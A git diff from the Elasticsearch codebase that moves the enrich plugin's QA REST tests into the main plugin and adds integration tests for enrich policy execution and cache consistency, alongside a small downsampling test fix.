a/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java b/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java index e1aa3fe865ffd..b07a00c13903c 100644 --- a/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java +++ b/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java @@ -14,6 +14,7 @@ import org.elasticsearch.action.downsample.DownsampleConfig; import org.elasticsearch.cluster.metadata.DataStreamLifecycle; import org.elasticsearch.cluster.metadata.IndexMetadata; +import org.elasticsearch.cluster.routing.allocation.decider.EnableAllocationDecider; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.TimeValue; @@ -34,9 +35,12 @@ public class DataStreamLifecycleDownsampleDisruptionIT extends DownsamplingInteg @Override protected Settings nodeSettings(int nodeOrdinal, Settings otherSettings) { - Settings.Builder settings = Settings.builder().put(super.nodeSettings(nodeOrdinal, otherSettings)); - settings.put(DataStreamLifecycleService.DATA_STREAM_LIFECYCLE_POLL_INTERVAL, "1s"); - return settings.build(); + return Settings.builder() + .put(super.nodeSettings(nodeOrdinal, otherSettings)) + .put(DataStreamLifecycleService.DATA_STREAM_LIFECYCLE_POLL_INTERVAL, "1s") + // We disable shard rebalancing to avoid shard relocations timing out the `ensureGreen` call at the end of the test. See #131394 + .put(EnableAllocationDecider.CLUSTER_ROUTING_REBALANCE_ENABLE_SETTING.getKey(), "none") + .build(); } public void testDataStreamLifecycleDownsampleRollingRestart() throws Exception { @@ -85,7 +89,7 @@ public void testDataStreamLifecycleDownsampleRollingRestart() throws Exception { ensureDownsamplingStatus(targetIndex, IndexMetadata.DownsampleTaskStatus.SUCCESS, TimeValue.timeValueSeconds(120)); ensureGreen(targetIndex); - logger.info("-> Relocation has finished"); + logger.info("-> Index is green and downsampling completed successfully."); } private void ensureDownsamplingStatus(String downsampledIndex, IndexMetadata.DownsampleTaskStatus expectedStatus, TimeValue timeout) { diff --git a/x-pack/plugin/enrich/build.gradle b/x-pack/plugin/enrich/build.gradle index 46972578ae1fc..e426a4f2c58cf 100644 --- a/x-pack/plugin/enrich/build.gradle +++ b/x-pack/plugin/enrich/build.gradle @@ -1,9 +1,12 @@ apply plugin: 'elasticsearch.internal-es-plugin' apply plugin: 'elasticsearch.internal-cluster-test' +apply plugin: 'elasticsearch.internal-java-rest-test' +apply plugin: 'elasticsearch.internal-yaml-rest-test' + esplugin { name = 'x-pack-enrich' description = 'Elasticsearch Expanded Pack Plugin - Enrich' - classname ='org.elasticsearch.xpack.enrich.EnrichPlugin' + classname = 'org.elasticsearch.xpack.enrich.EnrichPlugin' extendedPlugins = ['x-pack-core'] } base { @@ -20,6 +23,27 @@ dependencies { testImplementation project(xpackModule('spatial')) testImplementation(testArtifact(project(xpackModule('monitoring')))) internalClusterTestImplementation project(':modules:rest-root') + + clusterModules project(':modules:analysis-common') + clusterModules project(':modules:ingest-common') + clusterModules project(':modules:mapper-extras') + + clusterModules project(xpackModule('monitoring')) + clusterModules project(xpackModule('ilm')) + clusterModules project(xpackModule('wildcard')) +} + +tasks.named('yamlRestTest') { + // single tests can be run using the same cluster configuration as used for Java REST tests, but cleanup inbetween tests fails + usesDefaultDistribution("cleanUpCluster fails if not using the default distribution") +} + +restResources { + restApi { + include '_common', 'bulk', 'indices', 'index', 'ingest.delete_pipeline', 'ingest.put_pipeline', 'enrich', 'get', 'capabilities' + } + restTests { + includeXpack 'enrich' + } } -addQaCheckDependencies(project) diff --git a/x-pack/plugin/enrich/qa/common/build.gradle b/x-pack/plugin/enrich/qa/common/build.gradle deleted file mode 100644 index d12c4b471b29e..0000000000000 --- a/x-pack/plugin/enrich/qa/common/build.gradle +++ /dev/null @@ -1,5 +0,0 @@ -apply plugin: 'elasticsearch.java' - -dependencies { - api project(':test:framework') -} diff --git a/x-pack/plugin/enrich/qa/rest-with-advanced-security/build.gradle b/x-pack/plugin/enrich/qa/rest-with-advanced-security/build.gradle deleted file mode 100644 index 6a1f820e36205..0000000000000 --- a/x-pack/plugin/enrich/qa/rest-with-advanced-security/build.gradle +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.legacy-java-rest-test' - -dependencies { - javaRestTestImplementation project(path: xpackModule('core')) - javaRestTestImplementation project(path: xpackModule('enrich:qa:common')) -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - extraConfigFile 'roles.yml', file('roles.yml') - user username: "test_admin", password: "x-pack-test-password", role: "superuser" - user username: "test_enrich", password: "x-pack-test-password", role: "integ_test_role" - setting 'xpack.license.self_generated.type', 'trial' - setting 'xpack.security.enabled', 'true' - setting 'xpack.monitoring.collection.enabled', 'true' -} diff --git a/x-pack/plugin/enrich/qa/rest-with-security/build.gradle b/x-pack/plugin/enrich/qa/rest-with-security/build.gradle deleted file mode 100644 index 17a213a6e7f0d..0000000000000 --- a/x-pack/plugin/enrich/qa/rest-with-security/build.gradle +++ /dev/null @@ -1,28 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.legacy-java-rest-test' - -dependencies { - javaRestTestImplementation project(path: xpackModule('core')) - javaRestTestImplementation project(path: xpackModule('enrich:qa:common')) -} -if (buildParams.inFipsJvm){ - // This test cluster is using a BASIC license and FIPS 140 mode is not supported in BASIC - tasks.named("javaRestTest").configure{enabled = false } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - extraConfigFile 'roles.yml', file('roles.yml') - user username: "test_admin", password: "x-pack-test-password", role: "superuser" - user username: "test_enrich", password: "x-pack-test-password", role: "enrich_user,integ_test_role" - user username: "test_enrich_no_privs", password: "x-pack-test-password", role: "enrich_no_privs" - setting 'xpack.license.self_generated.type', 'basic' - setting 'xpack.security.enabled', 'true' - setting 'xpack.monitoring.collection.enabled', 'true' -} diff --git a/x-pack/plugin/enrich/qa/rest/build.gradle b/x-pack/plugin/enrich/qa/rest/build.gradle deleted file mode 100644 index cf3c687004cbb..0000000000000 --- a/x-pack/plugin/enrich/qa/rest/build.gradle +++ /dev/null @@ -1,40 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.legacy-java-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test' - -import org.elasticsearch.gradle.Version - -restResources { - restApi { - include '_common', 'bulk', 'indices', 'index', 'ingest.delete_pipeline', 'ingest.put_pipeline', 'enrich', 'get', 'capabilities' - } - restTests { - includeXpack 'enrich' - } -} - -dependencies { - javaRestTestImplementation project(path: xpackModule('enrich:qa:common')) -} - -if (buildParams.inFipsJvm){ - // This test cluster is using a BASIC license and FIPS 140 mode is not supported in BASIC - tasks.named("javaRestTest").configure{enabled = false } - tasks.named("yamlRestTest").configure{enabled = false } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.license.self_generated.type', 'basic' - setting 'xpack.monitoring.collection.enabled', 'true' - setting 'xpack.security.enabled', 'false' - requiresFeature 'es.index_mode_feature_flag_registered', Version.fromString("8.4.0") -} - diff --git a/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichPolicyChangeIT.java b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichPolicyChangeIT.java new file mode 100644 index 0000000000000..27c11e4300437 --- /dev/null +++ b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichPolicyChangeIT.java @@ -0,0 +1,173 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.enrich; + +import org.elasticsearch.action.index.IndexRequest; +import org.elasticsearch.action.ingest.SimulateDocumentBaseResult; +import org.elasticsearch.action.support.WriteRequest; +import org.elasticsearch.cluster.service.ClusterService; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.core.Strings; +import org.elasticsearch.ingest.common.IngestCommonPlugin; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.reindex.ReindexPlugin; +import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.xcontent.XContentType; +import org.elasticsearch.xpack.core.XPackSettings; +import org.elasticsearch.xpack.core.enrich.EnrichPolicy; +import org.elasticsearch.xpack.core.enrich.action.ExecuteEnrichPolicyAction; +import org.elasticsearch.xpack.core.enrich.action.PutEnrichPolicyAction; + +import java.util.Collection; +import java.util.List; +import java.util.concurrent.atomic.AtomicBoolean; + +import static org.elasticsearch.ingest.IngestPipelineTestUtils.jsonSimulatePipelineRequest; +import static org.elasticsearch.xpack.enrich.AbstractEnrichTestCase.createSourceIndices; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.nullValue; + +public class EnrichPolicyChangeIT extends ESSingleNodeTestCase { + + @Override + protected Collection> getPlugins() { + return List.of(LocalStateEnrich.class, ReindexPlugin.class, IngestCommonPlugin.class); + } + + @Override + protected Settings nodeSettings() { + return Settings.builder() + // TODO Change this to run with security enabled + // https://github.com/elastic/elasticsearch/issues/75940 + .put(XPackSettings.SECURITY_ENABLED.getKey(), false) + .build(); + } + + private final String policyName = "device-enrich-policy"; + private final String sourceIndexName = "devices-idx"; + + public void testEnrichCacheValuesCannotBeCorrupted() throws Exception { + // create and store the enrich policy + final var enrichPolicy = new EnrichPolicy( + EnrichPolicy.MATCH_TYPE, + null, + List.of(sourceIndexName), + "host.ip", + List.of("device.name", "host.ip") + ); + + // create the source index + createSourceIndices(client(), enrichPolicy); + + // add a single document to the enrich index + setEnrichDeviceName("some.device." + randomAlphaOfLength(10)); + + // store the enrich policy + var putPolicyRequest = new PutEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName, enrichPolicy); + client().execute(PutEnrichPolicyAction.INSTANCE, putPolicyRequest).actionGet(); + + // execute the policy once + executeEnrichPolicy(); + + // add a low priority cluster state applier to increase the odds of a race occurring between + // the cluster state *appliers* having been run (this adjusts the enrich index pointer) and the + // cluster state *listeners* having been run (which adjusts the alias and therefore the search results) + final var clusterService = node().injector().getInstance(ClusterService.class); + clusterService.addLowPriorityApplier((event) -> safeSleep(10)); + + // kick off some threads that just bang on _simulate in the background + final var finished = new AtomicBoolean(false); + for (int i = 0; i < 5; i++) { + new Thread(() -> { + while (finished.get() == false) { + simulatePipeline(); + } + }).start(); + } + + try { + for (int i = 0; i < randomIntBetween(10, 100); i++) { + final String deviceName = "some.device." + randomAlphaOfLength(10); + + // add a single document to the enrich index + setEnrichDeviceName(deviceName); + + // execute the policy + executeEnrichPolicy(); + + // simulate the pipeline and confirm that we see the expected result + assertBusy(() -> { + var result = simulatePipeline(); + assertThat(result.getFailure(), nullValue()); + assertThat(result.getIngestDocument().getFieldValue("device.name", String.class), equalTo(deviceName)); + }); + } + } finally { + // we're finished, so those threads can all quit now + finished.set(true); + } + } + + private SimulateDocumentBaseResult simulatePipeline() { + final var simulatePipelineRequest = jsonSimulatePipelineRequest(""" + { + "pipeline": { + "processors": [ + { + "enrich": { + "policy_name": "device-enrich-policy", + "field": "host.ip", + "target_field": "_tmp.device" + } + }, + { + "rename" : { + "field" : "_tmp.device.device.name", + "target_field" : "device.name" + } + } + ] + }, + "docs": [ + { + "_source": { + "host": { + "ip": "10.151.80.8" + } + } + } + ] + } + """); + final var response = clusterAdmin().simulatePipeline(simulatePipelineRequest).actionGet(); + return (SimulateDocumentBaseResult) response.getResults().getFirst(); + } + + private void setEnrichDeviceName(final String deviceName) { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("1"); // there's only one document, and we keep overwriting it + indexRequest.source(Strings.format(""" + { + "host": { + "ip": "10.151.80.8" + }, + "device": { + "name": "%s" + } + } + """, deviceName), XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + } + + private void executeEnrichPolicy() { + final var executePolicyRequest = new ExecuteEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName); + client().execute(ExecuteEnrichPolicyAction.INSTANCE, executePolicyRequest).actionGet(); + } + +} diff --git a/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichSourceDataChangeIT.java b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichSourceDataChangeIT.java new file mode 100644 index 0000000000000..74fe6315a1ae2 --- /dev/null +++ b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichSourceDataChangeIT.java @@ -0,0 +1,167 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.enrich; + +import org.elasticsearch.action.get.GetRequest; +import org.elasticsearch.action.index.IndexRequest; +import org.elasticsearch.action.support.WriteRequest; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.core.Strings; +import org.elasticsearch.ingest.common.IngestCommonPlugin; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.reindex.ReindexPlugin; +import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.xcontent.XContentType; +import org.elasticsearch.xpack.core.XPackSettings; +import org.elasticsearch.xpack.core.enrich.EnrichPolicy; +import org.elasticsearch.xpack.core.enrich.action.ExecuteEnrichPolicyAction; +import org.elasticsearch.xpack.core.enrich.action.PutEnrichPolicyAction; + +import java.util.Collection; +import java.util.List; +import java.util.Map; + +import static org.elasticsearch.xpack.enrich.AbstractEnrichTestCase.createSourceIndices; +import static org.hamcrest.Matchers.equalTo; + +public class EnrichSourceDataChangeIT extends ESSingleNodeTestCase { + + @Override + protected Collection> getPlugins() { + return List.of(LocalStateEnrich.class, ReindexPlugin.class, IngestCommonPlugin.class); + } + + @Override + protected Settings nodeSettings() { + return Settings.builder() + // TODO Change this to run with security enabled + // https://github.com/elastic/elasticsearch/issues/75940 + .put(XPackSettings.SECURITY_ENABLED.getKey(), false) + .build(); + } + + private final String policyName = "device-enrich-policy"; + private final String sourceIndexName = "devices-idx"; + + public void testChangesToTheSourceIndexTakeEffectOnPolicyExecution() throws Exception { + // create and store the enrich policy + final var enrichPolicy = new EnrichPolicy( + EnrichPolicy.MATCH_TYPE, + null, + List.of(sourceIndexName), + "host.ip", + List.of("device.name", "host.ip") + ); + + // create the source index + createSourceIndices(client(), enrichPolicy); + + final String initialDeviceName = "some.device." + randomAlphaOfLength(10); + + // add a single document to the enrich index + setEnrichDeviceName(initialDeviceName); + + // store the enrich policy and execute it + var putPolicyRequest = new PutEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName, enrichPolicy); + client().execute(PutEnrichPolicyAction.INSTANCE, putPolicyRequest).actionGet(); + executeEnrichPolicy(); + + // create an honest to goodness pipeline for repeated executions (we're not running any _simulate requests here) + final String pipelineName = "my-pipeline"; + putJsonPipeline(pipelineName, """ + { + "processors": [ + { + "enrich": { + "policy_name": "device-enrich-policy", + "field": "host.ip", + "target_field": "_tmp.device" + } + }, + { + "rename" : { + "field" : "_tmp.device.device.name", + "target_field" : "device.name" + } + }, + { + "remove" : { + "field" : "_tmp" + } + } + ] + }"""); + + { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("1"); + indexRequest.setPipeline("my-pipeline"); + indexRequest.source(""" + { + "host": { + "ip": "10.151.80.8" + } + } + """, XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + + final var response = client().get(new GetRequest(sourceIndexName).id("1")).actionGet(); + assertThat(response.getSource().get("device"), equalTo(Map.of("name", initialDeviceName))); + } + + // add different document to the enrich index + final String changedDeviceName = "some.device." + randomAlphaOfLength(10); + setEnrichDeviceName(changedDeviceName); + + // execute the policy to pick up the change + executeEnrichPolicy(); + + // it can take a moment for the execution to take effect, so assertBusy + assertBusy(() -> { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("2"); + indexRequest.setPipeline("my-pipeline"); + indexRequest.source(""" + { + "host": { + "ip": "10.151.80.8" + } + } + """, XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + + final var response = client().get(new GetRequest(sourceIndexName).id("2")).actionGet(); + assertThat(response.getSource().get("device"), equalTo(Map.of("name", changedDeviceName))); + }); + } + + private void setEnrichDeviceName(final String deviceName) { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("1"); // there's only one document, and we keep overwriting it + indexRequest.source(Strings.format(""" + { + "host": { + "ip": "10.151.80.8" + }, + "device": { + "name": "%s" + } + } + """, deviceName), XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + } + + private void executeEnrichPolicy() { + final var executePolicyRequest = new ExecuteEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName); + client().execute(ExecuteEnrichPolicyAction.INSTANCE, executePolicyRequest).actionGet(); + } + +} diff --git a/x-pack/plugin/enrich/qa/common/src/main/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java similarity index 92% rename from x-pack/plugin/enrich/qa/common/src/main/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java index 7107553d8b8b3..6c1f6055a4d22 100644 --- a/x-pack/plugin/enrich/qa/common/src/main/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java @@ -11,10 +11,14 @@ import org.elasticsearch.client.Response; import org.elasticsearch.client.ResponseException; import org.elasticsearch.common.Strings; +import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.util.concurrent.ThreadContext; import org.elasticsearch.common.xcontent.XContentHelper; import org.elasticsearch.common.xcontent.support.XContentMapValues; import org.elasticsearch.index.query.QueryBuilders; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.local.LocalClusterSpecBuilder; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.json.JsonXContent; @@ -34,6 +38,27 @@ public abstract class CommonEnrichRestTestCase extends ESRestTestCase { + static LocalClusterSpecBuilder enrichCluster(String license, boolean isSecurityEnabled) { + return ElasticsearchCluster.local() + .module("analysis-common") + .module("ingest-common") + .module("mapper-extras") + .module("x-pack-enrich") + .module("x-pack-monitoring") + .module("x-pack-ilm") + .module("wildcard") + .setting("xpack.security.enabled", Boolean.toString(isSecurityEnabled)) + .setting("xpack.license.self_generated.type", license) + // silence stats collector errors (we don't want to add all xpack modules here) + .setting("logger.org.elasticsearch.xpack.monitoring.collector", "fatal") + .setting("xpack.monitoring.collection.enabled", "true"); + } + + static Settings authRequestHeaderSetting(String user, String password) { + String token = basicAuthHeaderValue(user, new SecureString(password.toCharArray())); + return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + } + private List cleanupPipelines = new ArrayList<>(); /** diff --git a/x-pack/plugin/enrich/qa/rest-with-advanced-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichAdvancedSecurityIT.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichAdvancedSecurityIT.java similarity index 88% rename from x-pack/plugin/enrich/qa/rest-with-advanced-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichAdvancedSecurityIT.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichAdvancedSecurityIT.java index 7621e975eab22..ebd6b4444710a 100644 --- a/x-pack/plugin/enrich/qa/rest-with-advanced-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichAdvancedSecurityIT.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichAdvancedSecurityIT.java @@ -4,13 +4,13 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.enrich; +package org.elasticsearch.test.enrich; import org.elasticsearch.client.Request; -import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; -import org.elasticsearch.test.enrich.CommonEnrichRestTestCase; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.util.resource.Resource; +import org.junit.ClassRule; import java.io.IOException; import java.util.Map; @@ -20,16 +20,29 @@ public class EnrichAdvancedSecurityIT extends CommonEnrichRestTestCase { + public static final String ADMIN_USER = "test_admin"; + public static final String ENRICH_USER = "test_enrich"; + public static final String TEST_PASSWORD = "x-pack-test-password"; + + @ClassRule + public static ElasticsearchCluster cluster = enrichCluster("trial", true).rolesFile(Resource.fromClasspath("advanced_roles.yml")) + .user(ADMIN_USER, TEST_PASSWORD, "superuser", true) + .user(ENRICH_USER, TEST_PASSWORD, "integ_test_role", false) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Override protected Settings restClientSettings() { - String token = basicAuthHeaderValue("test_enrich", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ENRICH_USER, TEST_PASSWORD); } @Override protected Settings restAdminSettings() { - String token = basicAuthHeaderValue("test_admin", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ADMIN_USER, TEST_PASSWORD); } public void testEnrichEnforcesDLS() throws IOException { diff --git a/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichIT.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichIT.java new file mode 100644 index 0000000000000..b24e43f4c7581 --- /dev/null +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichIT.java @@ -0,0 +1,20 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +package org.elasticsearch.test.enrich; + +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.junit.ClassRule; + +public class EnrichIT extends CommonEnrichRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = enrichCluster("basic", false).build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } +} diff --git a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityFailureIT.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityFailureIT.java similarity index 53% rename from x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityFailureIT.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityFailureIT.java index 0efb3efe2928d..8d6fb67c44145 100644 --- a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityFailureIT.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityFailureIT.java @@ -4,30 +4,42 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.enrich; +package org.elasticsearch.test.enrich; import org.elasticsearch.client.Request; import org.elasticsearch.client.ResponseException; -import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; -import org.elasticsearch.test.enrich.CommonEnrichRestTestCase; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.util.resource.Resource; import org.elasticsearch.test.rest.ESRestTestCase; - -import static org.elasticsearch.xpack.core.security.authc.support.UsernamePasswordToken.basicAuthHeaderValue; +import org.junit.ClassRule; public class EnrichSecurityFailureIT extends ESRestTestCase { + public static final String ADMIN_USER = "test_admin"; + public static final String ENRICH_USER = "test_enrich_no_privs"; + public static final String TEST_PASSWORD = "x-pack-test-password"; + + @ClassRule + public static ElasticsearchCluster cluster = CommonEnrichRestTestCase.enrichCluster("basic", true) + .rolesFile(Resource.fromClasspath("roles.yml")) + .user(ADMIN_USER, TEST_PASSWORD, "superuser", true) + .user(ENRICH_USER, TEST_PASSWORD, "enrich_no_privs", false) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Override protected Settings restClientSettings() { - String token = basicAuthHeaderValue("test_enrich_no_privs", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return CommonEnrichRestTestCase.authRequestHeaderSetting(ENRICH_USER, TEST_PASSWORD); } @Override protected Settings restAdminSettings() { - String token = basicAuthHeaderValue("test_admin", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return CommonEnrichRestTestCase.authRequestHeaderSetting(ADMIN_USER, TEST_PASSWORD); } public void testFailure() throws Exception { diff --git a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityIT.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityIT.java similarity index 65% rename from x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityIT.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityIT.java index 1d3a1c8b93561..f65f0f4b77c5b 100644 --- a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityIT.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityIT.java @@ -4,30 +4,43 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.enrich; +package org.elasticsearch.test.enrich; import org.elasticsearch.client.Request; import org.elasticsearch.client.ResponseException; -import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; import org.elasticsearch.core.Strings; -import org.elasticsearch.test.enrich.CommonEnrichRestTestCase; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.util.resource.Resource; +import org.junit.ClassRule; import static org.hamcrest.CoreMatchers.containsString; public class EnrichSecurityIT extends CommonEnrichRestTestCase { + public static final String ADMIN_USER = "test_admin"; + public static final String ENRICH_USER = "test_enrich"; + public static final String TEST_PASSWORD = "x-pack-test-password"; + + @ClassRule + public static ElasticsearchCluster cluster = enrichCluster("basic", true).rolesFile(Resource.fromClasspath("roles.yml")) + .user(ADMIN_USER, TEST_PASSWORD, "superuser", true) + .user(ENRICH_USER, TEST_PASSWORD, "enrich_user,integ_test_role", false) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Override protected Settings restClientSettings() { - String token = basicAuthHeaderValue("test_enrich", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ENRICH_USER, TEST_PASSWORD); } @Override protected Settings restAdminSettings() { - String token = basicAuthHeaderValue("test_admin", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ADMIN_USER, TEST_PASSWORD); } public void testInsufficientPermissionsOnNonExistentIndex() throws Exception { diff --git a/x-pack/plugin/enrich/qa/rest-with-advanced-security/roles.yml b/x-pack/plugin/enrich/src/javaRestTest/resources/advanced_roles.yml similarity index 100% rename from x-pack/plugin/enrich/qa/rest-with-advanced-security/roles.yml rename to x-pack/plugin/enrich/src/javaRestTest/resources/advanced_roles.yml diff --git a/x-pack/plugin/enrich/qa/rest-with-security/roles.yml b/x-pack/plugin/enrich/src/javaRestTest/resources/roles.yml similarity index 100% rename from x-pack/plugin/enrich/qa/rest-with-security/roles.yml rename to x-pack/plugin/enrich/src/javaRestTest/resources/roles.yml diff --git 